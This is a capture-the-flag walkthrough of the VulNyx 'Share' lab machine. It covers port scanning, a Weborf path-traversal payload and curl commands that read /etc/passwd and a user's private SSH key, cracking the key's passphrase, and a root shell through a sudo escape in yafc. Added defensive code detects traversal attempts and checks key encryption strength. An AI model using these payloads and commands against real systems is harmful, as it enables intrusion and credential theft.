VulNyx - Share
Information
Share is a low-difficulty vulnerable Linux virtual machine from the VulNyx platform. It was created by the user d4t4s3c and runs correctly on the VirtualBox and VMware hypervisors.

Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 08:00 CEST
Nmap scan report for 192.168.1.81
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
❯ nmap -sVC -p22,80,8080 192.168.1.81
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 08:00 CEST
Nmap scan report for 192.168.1.81
Host is up (0.00086s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
8080/tcp open http-proxy Weborf (GNU/Linux)
| http-webdav-scan:
| Allowed Methods: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
| WebDAV type: Apache DAV
|_ Server Type: Weborf (GNU/Linux)
|_http-server-header: Weborf (GNU/Linux)
| http-methods:
|_ Potentially risky methods: PUT DELETE PROPFIND MKCOL COPY MOVE
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
| Content-Length: 202
| Content-Type: text/html
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| GetRequest:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Content-Length: 960
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-53a1c89e80fd4bebb449fccd86dd7b10-apache2.service-fyx7mg/">systemd-private-53a1c89e80fd4bebb449fccd86dd7b10-apache2.service-fyx7mg/</a></td><td>-</td></tr>
| style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-53a1c89e80fd4bebb449fccd86dd7b10-systemd-logind.service-PtbMjf/">systemd-private-53a1c89e80fd4bebb449fccd86dd7b10-systemd-logind.service-PtbMjf/</a></td><td>-</td></tr>
| style="background-color: #DFDFDF;"><td>d</td><td><a href="systemd-private-53a1c89e80fd4bebb449fccd86dd7b10-systemd-timesyncd.service-y5DQmg/">systemd-private-53a1c89e80fd4bebb449fccd86dd7b10-
| HTTPOptions, RTSPRequest:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
| DAV: 1,2
| DAV: <http://apache.org/dav/propset/fs/1>
| MS-Author-Via: DAV
| Socks5:
| HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
| Content-Length: 199
| Content-Type: text/html
|_ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|_http-title: Weborf
Shell (tim)
80/TCP (HTTP)
Site

Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.81/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.81/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 277]
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================
8080/TCP (HTTP)
Weborf
I identify a Weborf file-sharing server, version 0.12.2.

I find an exploit for the Path Traversal vulnerability CVE-2010-3306; the PoC is the following:
/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
CVE-2010-3306
I manage to read the /etc/passwd file and enumerate the users tim and root.
❯ curl -sX GET "http://192.168.1.81:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" |grep "sh$"
root:x:0:0:root:/root:/bin/bash
tim:x:1000:1000:tim:/home/tim:/bin/bash
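The traversal above works because the encoded slash (%2f) is not seen by a check that looks for a literal "../" in the raw request. The following is an added example, not code from the writeup or from Weborf, showing the defender's side: decoding the path fully before deciding, refusing any ".." component, anchoring the result inside an assumed document root (/srv/webdav), and flagging such requests in constructed Apache-style access-log lines.

```python
import os
import posixpath
import re
from urllib.parse import unquote

# Assumed document root for the example; the real Weborf root on the box is
# not stated in the writeup.
DOCROOT = "/srv/webdav"

# Constructed access-log lines (Apache combined format), not taken from the box.
SAMPLE_LOG = """\
10.0.0.5 - - [26/May/2025:08:01:02 +0200] "GET /docs/readme.txt HTTP/1.1" 200 512 "-" "curl/8.5.0"
10.0.0.5 - - [26/May/2025:08:01:03 +0200] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1400 "-" "curl/8.5.0"
10.0.0.5 - - [26/May/2025:08:01:04 +0200] "GET /%252e%252e/%252e%252e/etc/shadow HTTP/1.1" 404 202 "-" "curl/8.5.0"
10.0.0.5 - - [26/May/2025:08:01:05 +0200] "GET /images/..%2fsecret.png HTTP/1.1" 404 202 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def fully_decode(path, max_rounds=3):
    """Percent-decode repeatedly so that double-encoded forms (%252f) are seen too."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def naive_check(raw_path):
    """The kind of check a traversal bug slips past: it looks for a literal
    '../' in the raw path, so '..%2f' is never noticed."""
    return "../" in raw_path


def is_traversal_attempt(raw_path):
    """True when the decoded request contains a '..' path component."""
    decoded = fully_decode(raw_path.split("?", 1)[0])
    return ".." in decoded.replace("\\", "/").split("/")


def resolve_request_path(docroot, raw_path):
    """Map a URL path onto the filesystem; return None for anything that
    tries to leave docroot (by '..' or by a symlink pointing outside)."""
    if is_traversal_attempt(raw_path):
        return None
    decoded = fully_decode(raw_path.split("?", 1)[0])
    # Lexically collapse '.', repeated slashes, etc. relative to the root.
    normalized = posixpath.normpath("/" + decoded.replace("\\", "/"))
    candidate = os.path.join(docroot, normalized.lstrip("/"))
    root = os.path.realpath(docroot)
    real = os.path.realpath(candidate)
    if real != root and not real.startswith(root + os.sep):
        return None
    return real


def flag_log_lines(log_text):
    """Return the request paths in an access log that look like traversal."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_traversal_attempt(m.group("path")):
            hits.append(m.group("path"))
    return hits


if __name__ == "__main__":
    poc = "/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
    print("naive check catches PoC:", naive_check(poc))
    print("decoded check catches PoC:", is_traversal_attempt(poc))
    print("resolved:", resolve_request_path(DOCROOT, poc))
    for hit in flag_log_lines(SAMPLE_LOG):
        print("suspicious request:", hit)
```

The decode-then-split check is what the detection relies on; the realpath comparison is a second layer for the symlink case, which lexical normalisation alone cannot see.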
In the home directory of user tim I find his private key, id_rsa.
❯ curl -sX GET "http://192.168.1.81:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2ftim%2f.ssh%2fid_rsa" |tee id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,18A95149B088CB78
[...]
-----END RSA PRIVATE KEY-----
22/TCP (SSH)
Cracking (id_rsa)
With RSAcrack I obtain the passphrase ilovetim.
❯ RSAcrack -w /opt/techyou.txt -k id_rsa
╭━━━┳━━━┳━━━╮ ╭╮
┃╭━╮┃╭━╮┃╭━╮┃ ┃┃
┃╰━╯┃╰━━┫┃ ┃┣━━┳━┳━━┳━━┫┃╭╮
┃╭╮╭┻━━╮┃╰━╯┃╭━┫╭┫╭╮┃╭━┫╰╯╯
┃┃┃╰┫╰━╯┃╭━╮┃╰━┫┃┃╭╮┃╰━┫╭╮╮
╰╯╰━┻━━━┻╯ ╰┻━━┻╯╰╯╰┻━━┻╯╰╯
─────────────────────────────
code: d4t4s3c ver: v1.0.0
─────────────────────────────
[i] Cracking | id_rsa
[i] Wordlist | /opt/techyou.txt
[*] Status | 5280/10000/52%/ilovetim
[+] Password | ilovetim
─────────────────────────────
I access the system as user tim.
❯ ssh -i id_rsa tim@192.168.1.81
Enter passphrase for key 'id_rsa':
tim@share:~$ id ; hostname
uid=1000(tim) gid=1000(tim) grupos=1000(tim)
share
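The key was crackable with a wordlist so quickly because its "Proc-Type: 4,ENCRYPTED" / "DEK-Info: DES-EDE3-CBC" headers mark the legacy PEM encryption, whose key is derived from the passphrase with a single MD5 pass (OpenSSL's EVP_BytesToKey), so each guess costs one hash. The following is an added example, not part of the writeup, that inspects a private key file and reports whether it is protected by that legacy scheme or by the newer OpenSSH format with the bcrypt KDF. Both key files in it are constructed headers with no real key material.

```python
import base64
import struct

# Constructed legacy PEM file: headers as on the box, placeholder IV and body.
LEGACY_PEM = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,0123456789ABCDEF

QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(data):
    """Length-prefixed string as used in the OpenSSH key format."""
    return struct.pack(">I", len(data)) + data


# Constructed new-format header only: magic, cipher, KDF and KDF options
# (16-byte salt + rounds); the key blobs that would follow are omitted.
_OPENSSH_HEADER = (
    b"openssh-key-v1\x00"
    + _ssh_string(b"aes256-ctr")
    + _ssh_string(b"bcrypt")
    + _ssh_string(_ssh_string(b"\x00" * 16) + struct.pack(">I", 100))
)
OPENSSH_PEM = (
    "-----BEGIN OPENSSH PRIVATE KEY-----\n"
    + base64.b64encode(_OPENSSH_HEADER).decode()
    + "\n-----END OPENSSH PRIVATE KEY-----\n"
)


def _read_string(buf, off):
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    return buf[off:off + n], off + n


def inspect_private_key(text):
    """Return format, cipher and KDF details of a PEM or OpenSSH private key."""
    lines = [l.strip() for l in text.strip().splitlines()]
    info = {"format": None, "encrypted": False, "cipher": None, "kdf": None, "rounds": None}
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        info["format"] = "openssh"
        blob = base64.b64decode("".join(lines[1:-1]))
        off = blob.index(b"\x00") + 1          # skip "openssh-key-v1\0"
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        info["cipher"] = cipher.decode()
        info["kdf"] = kdf.decode()
        info["encrypted"] = cipher != b"none"
        if kdf == b"bcrypt":
            _salt, o = _read_string(kdfopts, 0)
            (info["rounds"],) = struct.unpack_from(">I", kdfopts, o)
    else:
        info["format"] = "pem"
        headers = {}
        for line in lines[1:]:
            if not line:                        # blank line ends the headers
                break
            if ":" in line:
                k, v = line.split(":", 1)
                headers[k.strip()] = v.strip()
        if headers.get("Proc-Type", "").endswith("ENCRYPTED"):
            info["encrypted"] = True
            info["cipher"] = headers.get("DEK-Info", "").split(",")[0]
            # Legacy PEM: key = MD5(passphrase || first 8 bytes of IV), one pass.
            info["kdf"] = "EVP_BytesToKey(MD5, 1 iteration)"
            info["rounds"] = 1
    return info


def is_weakly_protected(info):
    """Unencrypted keys and legacy-PEM-encrypted keys both count as weak."""
    return (not info["encrypted"]) or info["kdf"] != "bcrypt"


if __name__ == "__main__":
    for name, key in (("legacy", LEGACY_PEM), ("openssh", OPENSSH_PEM)):
        info = inspect_private_key(key)
        print(name, info, "WEAK" if is_weakly_protected(info) else "ok")
```

The remediation is to re-encrypt the key in the new format with a high round count, for example ssh-keygen -p -o -a 100 -f id_rsa, and of course to pick a passphrase that is not in a wordlist.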
Privilege Escalation
Enumeration
Sudo
User tim can run the yafc binary as root with sudo.
tim@share:~$ sudo -l
Matching Defaults entries for tim on share:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tim may run the following commands on share:
(root) NOPASSWD: /usr/bin/yafc
Abuse
Looking at yafc's help, the ! command allows external commands to be executed.
tim@share:~$ yafc
yafc 1.3.7
This program comes with ABSOLUTELY NO WARRANTY; for details type 'warranty'.
This is free software; type 'copyright' for details.
yafc> help
Available commands: (commands may be abbreviated)
!
I become root by abusing this privilege.
tim@share:/$ sudo -u root /usr/bin/yafc
yafc 1.3.7
This program comes with ABSOLUTELY NO WARRANTY; for details type 'warranty'.
This is free software; type 'copyright' for details.
yafc> !/bin/bash
root@share:/# id ; hostname
uid=0(root) gid=0(root) grupos=0(root)
share
Flags
Now as root I can read the user.txt and root.txt flags.
root@share:/# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
9afc****************************
721e****************************
That concludes the resolution of the Share machine.
Happy Hacking!